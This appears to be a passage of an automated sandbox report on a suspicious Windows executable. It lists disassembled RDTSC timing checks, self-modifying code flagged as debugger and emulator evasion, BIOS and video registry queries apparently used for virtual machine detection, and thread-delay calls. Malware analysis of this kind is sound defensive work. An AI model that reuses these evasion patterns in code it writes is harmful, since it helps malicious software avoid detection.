Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D916F6 second address: 4D916FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D916FA second address: 4D9170B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9170B second address: 4D9175F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FEEE08A230Ch 0x00000010 call 00007FEEE08A2312h 0x00000015 mov bx, cx 0x00000018 pop ecx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c mov ch, 86h 0x0000001e jmp 00007FEEE08A230Fh 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9175F second address: 4D91763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91655 second address: 4D91670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91670 second address: 4D91675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91675 second address: 4D916D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop edx 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007FEEE08A2313h 0x00000018 or ax, B15Eh 0x0000001d jmp 00007FEEE08A2319h 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FEEE08A230Ah 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D916D8 second address: 4D60D8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov dl, 0Fh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp dword ptr [74E5155Ch] 0x00000010 mov edi, edi 0x00000012 push ebp 0x00000013 mov ebp, esp 0x00000015 mov ecx, dword ptr fs:[00000018h] 0x0000001c mov eax, dword ptr [ebp+08h] 0x0000001f mov dword ptr [ecx+34h], 00000000h 0x00000026 cmp eax, 40h 0x00000029 jnc 00007FEEE0EE360Dh 0x0000002b mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 test eax, eax 0x00000038 je 00007FEEE0EE3623h 0x0000003a mov eax, dword ptr [0043200Ch] 0x0000003f cmp eax, FFFFFFFFh 0x00000042 je 00007FEEE0EE3619h 0x00000044 mov esi, 0042F1C0h 0x00000049 push esi 0x0000004a call 00007FEEE5842EFDh 0x0000004f mov edi, edi 0x00000051 jmp 00007FEEE0EE360Ah 0x00000056 xchg eax, ebp 0x00000057 pushad 0x00000058 mov cl, 44h 0x0000005a call 00007FEEE0EE3613h 0x0000005f pop edx 0x00000060 popad 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 mov ecx, 0A6ACCEDh 0x0000006a movzx eax, dx 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50463 second address: 4D504E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEE08A2317h 0x00000009 or ax, 58AEh 0x0000000e jmp 00007FEEE08A2319h 0x00000013 popfd 0x00000014 mov ah, E9h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007FEEE08A230Ah 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov edi, 64836E40h 0x00000028 pushfd 0x00000029 jmp 00007FEEE08A2319h 0x0000002e sub al, 00000046h 0x00000031 jmp 00007FEEE08A2311h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504E6 second address: 4D504F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE360Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504F6 second address: 4D504FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504FA second address: 4D5056E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FEEE0EE3617h 0x0000000f mov ecx, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov dx, si 0x00000016 mov edi, esi 0x00000018 popad 0x00000019 sub eax, eax 0x0000001b jmp 00007FEEE0EE3613h 0x00000020 inc eax 0x00000021 jmp 00007FEEE0EE3616h 0x00000026 lock xadd dword ptr [ecx], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FEEE0EE3617h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5056E second address: 4D50573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50573 second address: 4D50589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 inc eax 0x00000008 pushad 0x00000009 mov di, cx 0x0000000c mov ah, E3h 0x0000000e popad 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50589 second address: 4D5058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5058D second address: 4D50593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50593 second address: 4D505AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEEE08A2315h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A44 second address: 4DA0A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A4A second address: 4DA0A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2316h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A6B second address: 4DA0A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CCC second address: 4DA0CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A230Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CDE second address: 4DA0D49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FEEE0EE3619h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 call 00007FEEE0EE360Ch 0x00000018 pushfd 0x00000019 jmp 00007FEEE0EE3612h 0x0000001e sub esi, 0032DBB8h 0x00000024 jmp 00007FEEE0EE360Bh 0x00000029 popfd 0x0000002a pop esi 0x0000002b movsx edx, si 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D49 second address: 4DA0D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D4D second address: 4DA0D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D51 second address: 4DA0D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D57 second address: 4DA0D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE360Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D66 second address: 4DA0D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FEEE08A2315h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D8D second address: 4DA0D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D91 second address: 4DA0D97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D97 second address: 4DA0D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D9D second address: 4DA0DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0BFC second address: 4DA0C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 4Eh 0x00000005 mov edx, 7DC219F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEE0EE3619h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C25 second address: 4DA0C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A230Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C35 second address: 4DA0C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0B51 second address: 4DA0BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEE08A230Fh 0x00000009 add ah, FFFFFF9Eh 0x0000000c jmp 00007FEEE08A2319h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007FEEE08A230Ah 0x0000001f mov ebp, esp 0x00000021 jmp 00007FEEE08A2310h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEEE08A2317h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0BBF second address: 4DA0BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE3614h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A44 second address: 4DB0A8C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 57E07EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FEEE08A2314h 0x0000000f add cx, C118h 0x00000014 jmp 00007FEEE08A230Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FEEE08A2315h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A8C second address: 4DB0A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A92 second address: 4DB0A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A96 second address: 4DB0B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007FEEE0EE360Fh 0x00000012 pop edi 0x00000013 pushfd 0x00000014 jmp 00007FEEE0EE3614h 0x00000019 jmp 00007FEEE0EE3615h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FEEE0EE3618h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B0A second address: 4DB0B10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B10 second address: 4DB0B3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov al, F6h 0x0000000e movsx edx, si 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FEEE0EE3611h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC071B second address: 4DC0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0721 second address: 4DC0725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0725 second address: 4DC0745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FEEE08A2310h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0745 second address: 4DC075D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE3613h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80743 second address: 4D80749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80749 second address: 4D807B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx ecx, bx 0x0000000d pushfd 0x0000000e jmp 00007FEEE0EE3619h 0x00000013 add ecx, 272D17A6h 0x00000019 jmp 00007FEEE0EE3611h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007FEEE0EE360Eh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FEEE0EE3617h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807B3 second address: 4D807EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007FEEE08A230Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FEEE08A230Eh 0x0000001a sbb ecx, 7D9D8A08h 0x00000020 jmp 00007FEEE08A230Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D505CF second address: 4D5062D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 585DF74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FEEE0EE3610h 0x0000000f xor al, 00000058h 0x00000012 jmp 00007FEEE0EE360Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d push ecx 0x0000001e mov esi, ebx 0x00000020 pop edx 0x00000021 push ecx 0x00000022 jmp 00007FEEE0EE3613h 0x00000027 pop ecx 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FEEE0EE3612h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5062D second address: 4D50680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEE08A2311h 0x00000009 and cl, 00000006h 0x0000000c jmp 00007FEEE08A2311h 0x00000011 popfd 0x00000012 mov esi, 033B8FB7h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ecx, dword ptr [ebp+08h] 0x0000001d jmp 00007FEEE08A230Ah 0x00000022 or eax, FFFFFFFFh 0x00000025 pushad 0x00000026 mov cl, C4h 0x00000028 movsx edx, si 0x0000002b popad 0x0000002c lock xadd dword ptr [ecx], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50680 second address: 4D50686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50686 second address: 4D50463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, al 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a dec eax 0x0000000b jmp 00007FEEE08A2313h 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push esi 0x00000013 mov ebx, 43ED5C26h 0x00000018 pop ebx 0x00000019 popad 0x0000001a retn 0004h 0x0000001d nop 0x0000001e test eax, eax 0x00000020 jne 00007FEEE08A2313h 0x00000022 mov eax, dword ptr [esi+68h] 0x00000025 cmp eax, 00432340h 0x0000002a je 00007FEEE08A2309h 0x0000002c mov dword ptr [esi+68h], ebx 0x0000002f push ebx 0x00000030 mov edi, dword ptr [0042F014h] 0x00000036 call edi 0x00000038 mov edi, edi 0x0000003a pushad 0x0000003b push edx 0x0000003c pushfd 0x0000003d jmp 00007FEEE08A2316h 0x00000042 adc cl, FFFFFFA8h 0x00000045 jmp 00007FEEE08A230Bh 0x0000004a popfd 0x0000004b pop eax 0x0000004c pushfd 0x0000004d jmp 00007FEEE08A2319h 0x00000052 add ch, FFFFFFC6h 0x00000055 jmp 00007FEEE08A2311h 0x0000005a popfd 0x0000005b popad 0x0000005c xchg eax, ebp 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FEEE08A230Dh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0859 second address: 4DC0869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE360Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0869 second address: 4DC0882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC0882 second address: 4DC08FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEEE0EE360Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FEEE0EE3616h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FEEE0EE360Dh 0x00000020 adc cx, 9EC6h 0x00000025 jmp 00007FEEE0EE3611h 0x0000002a popfd 0x0000002b jmp 00007FEEE0EE3610h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91559 second address: 4D9155F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9155F second address: 4D91563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91563 second address: 4D9159E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FEEE08A2316h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEEE08A2317h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9159E second address: 4D915BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 42h 0x00000005 call 00007FEEE0EE3610h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D915BF second address: 4D915D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2316h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA00C5 second address: 4DA00F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, 06E6h 0x00000012 call 00007FEEE0EE3617h 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA00F6 second address: 4DA012E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, cl 0x00000005 pushfd 0x00000006 jmp 00007FEEE08A2311h 0x0000000b and ecx, 50B4F6F6h 0x00000011 jmp 00007FEEE08A2311h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA012E second address: 4DA015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FEEE0EE3618h 0x0000000a sub ecx, 089E7748h 0x00000010 jmp 00007FEEE0EE360Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA015E second address: 4DA01DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FEEE08A230Ch 0x00000011 add cx, 5CD8h 0x00000016 jmp 00007FEEE08A230Bh 0x0000001b popfd 0x0000001c popad 0x0000001d push esp 0x0000001e jmp 00007FEEE08A2312h 0x00000023 mov dword ptr [esp], ebx 0x00000026 pushad 0x00000027 mov ax, AF4Dh 0x0000002b mov eax, 1017F349h 0x00000030 popad 0x00000031 mov ebx, dword ptr [ebp+10h] 0x00000034 jmp 00007FEEE08A2314h 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA01DB second address: 4DA01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 825FA3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 825763 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9D9AC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A5CF14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00825CD4 rdtsc 0_2_00825CD4
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2589Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2375Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2381Jump to behavior
